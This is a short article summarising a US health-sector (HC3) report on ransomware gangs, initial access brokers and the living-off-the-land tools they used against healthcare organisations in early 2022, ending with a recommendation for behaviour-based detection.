The tactics, techniques, and procedures (TTPs) employed by ransomware and other cyber attackers are always changing to elude identification and enable the groups to carry out more successful attacks. The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has reviewed and shared the TTPs utilized in the 1st Q of 2022.
In Q1 of 2022, many ransomware attacks on the Healthcare and Public Health Sector (HPH) were performed by 5 ransomware-as-a-service gangs. The LockBit 2.0 and Conti ransomware groups were behind 31% of attacks, then SunCrypt (16%), Hive (11%), and ALPHV/BlackCat (11%). The financially inspired threat groups FIN7 and FIN12 have likewise changed their activities and have shifted to ransomware activities, with FIN7 together with ALPHV and FIN12 greatly engaged in attacks on the HPH industry. FIN12’s engagement has reduced the timescale for doing attacks from 5 to 2 days.
Ransomware groups usually partner with initial access brokers (IABs) that concentrate on acquiring access to organizations’ networks, then peddle the access information to the ransomware gangs. Using IABs helps ransomware groups focus on creating their ransomware variants and managing their RaaS activities, which permits them to improve their TTPs and perform more successful attacks. HC3 hasn’t see any modification in the numbers of IABs partnering with ransomware gangs in 1st Q of 2022, with identical numbers seen all through 2022.
IABs were normally seen marketing general VPN/RDP access to the systems of HPH entities on cybercrime community forums, which is over one half of forum advertisements, and approximately 25% of ads were featuring breached Citrix/VPN appliances. Organizations substantially used remote access solutions to assist a remote staff at the time of the COVID-19 pandemic, nevertheless the hurry to deploy meant non-implementation of essential security features, and substantial exploitation of flaws.
Ransomware groups are a lot more utilizing living-of-the-land (LOTL) methods in their attacks, making use of legit tools that are actually readily available in the areas of big companies at the time of ransomware attacks like CMD.exe, Task Scheduler, PowerShell, MSHTA, and Sysinternals. The usage of these tools allows the gang’s malicious activities more difficult to identify.
Tactics comprise of the usage of
- remote access resources like Atera, Window Safe Mode, AnyDesk, ScreenConnect, ManageEngine
- encryption tools including BitLocker and DiskCryptor
- file transfer tools like FileZilla FTP,
- Microsoft Sysinternals tools for instance Procdump, PsExec, and Dumpert
- open-source tools like Mimikatz, Cobalt Strike, Process Hacker, MegaSync, and AdFind.
Though the malicious use of these tools is tough to identify by security clubs, there are recognition opportunities. HC3 advises employing a behavior-based technique to detection, for example a Security Information and Event Management (SIEM) tool, that could discover malicious usage of LOTL tools which signature-based recognition tools could not.
The HC3 Ransomware Trends in the HPH Sector Report is accessible on this link. It presents thorough information about the TTPs used by every ransomware operation, such as the most often abused LOTL tools, pertinent ATT&CK tactics, and a lengthy list of mitigations that may be put in place to stop, find, reply to, and get over ransomware attacks.